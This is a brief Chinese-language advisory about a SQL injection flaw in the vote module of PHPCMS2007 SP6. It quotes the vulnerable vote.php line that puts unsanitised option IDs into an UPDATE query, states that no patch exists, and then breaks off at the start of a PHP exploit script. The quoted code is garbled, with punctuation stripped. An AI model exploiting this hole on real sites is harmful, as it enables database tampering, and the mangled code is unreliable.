PHPCMS2007 SP6 vote模块SQL注射漏洞

vote/vote.php // 22行 $optionids = isarray$op ? implode',',$op : $op; ... $db-query"UPDATE ".TABLEVOTEOPTION." SET number = number+1 WHERE optionid IN $optionids "; PHPCMS2007 SP6 暂无 !/usr/bin/php ?php printr' +---------------------------------------------------------------------------+ Phpcms 200...